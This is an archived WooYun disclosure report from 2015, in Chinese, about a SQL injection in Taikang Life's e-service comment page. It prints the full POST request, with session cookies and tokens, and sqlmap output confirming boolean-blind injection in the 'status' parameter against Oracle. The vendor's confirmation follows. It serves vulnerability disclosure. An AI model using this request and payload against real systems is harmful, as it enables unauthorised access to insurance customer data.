乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-21: 细节已通知厂商并且等待厂商处理中 2015-05-22: 厂商已经确认,细节仅向厂商公开 2015-06-01: 细节向核心白帽子及相关领域专家公开 2015-06-11: 细节向普通白帽子公开 2015-06-21: 细节向实习白帽子公开 2015-07-06: 细节向公众公开
如题
1、
POST /eservice/comment/showUserComments.jsp HTTP/1.1Host: ecs.taikang.comProxy-Connection: keep-aliveContent-Length: 95Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://ecs.taikang.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.0.595.32 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://ecs.taikang.com/eservice/comment/showUserComments.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: BIGipServerpool_128=2768439050.30755.0000; tkmssid=d001f59c-93b4-4a9c-afad-7b6f37495faa; tkmtoken=73455fcf82793244562cdaed9ffb4e5f; pgv_pvi=3802278912; pgv_si=s7317284864; _pzfxuvpc=1432194814721%7C1385191079499157093%7C1%7C1432194814727%7C1%7C%7C1310137810426910490; _pzfxsvpc=1310137810426910490%7C1432194814721%7C1%7C; _pzfxsfc=; 4000095522mid=686_86; 4000095522slid=slid_746_32%7C; 4000095522is=2; 4000095522mh=1432195160687; tkmid=8110342; tkmname=bush; JSESSIONID=0000QIdhEdR8DHYgMN-DuTiY9kq:-1; SESS[MEMBER]=0f251966b09a09b4c81560df38d3abcd; loginName=bush; UNAME=bush; UNAME1=8110342; MLV=1; CUR=CNY; LANG=CN; S[MEMBERID]=8110342; _gscu_1984844848=32195257me0rcr20; _gscs_1984844848=321952579lj5e520|pv:13; _gscbrs_1984844848=1; _smt_uid=555d90b9.4efa8d45; Hm_lvt_b7f4a12c6b299f2870e826ec7b955f9a=1432119017,1432194815; Hm_lpvt_b7f4a12c6b299f2870e826ec7b955f9a=1432195406; OZ_1U_2132=vid=v55d91141ff81a.0&ctime=1432195409<ime=1432195405productvalue=&statusvalue=&begintime=2015-05-21&endtime=2015-05-21&status=&title=12345&product=
2、
sqlmap identified the following injection points with a total of 1291 HTTP(s) requests:---Parameter: status (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: productvalue=&statusvalue=&begintime=2015-05-21&endtime=2015-05-21&status=-2873 OR 9504=9504&title=12345&product=---back-end DBMS: Oracle
3、
4、
5、
6、就不深入了,确定不是测试数据库。
危害等级:高
漏洞Rank:12
确认时间:2015-05-22 09:53
泰康人寿感谢您发现并提交给我们,已安排人员处理!
暂无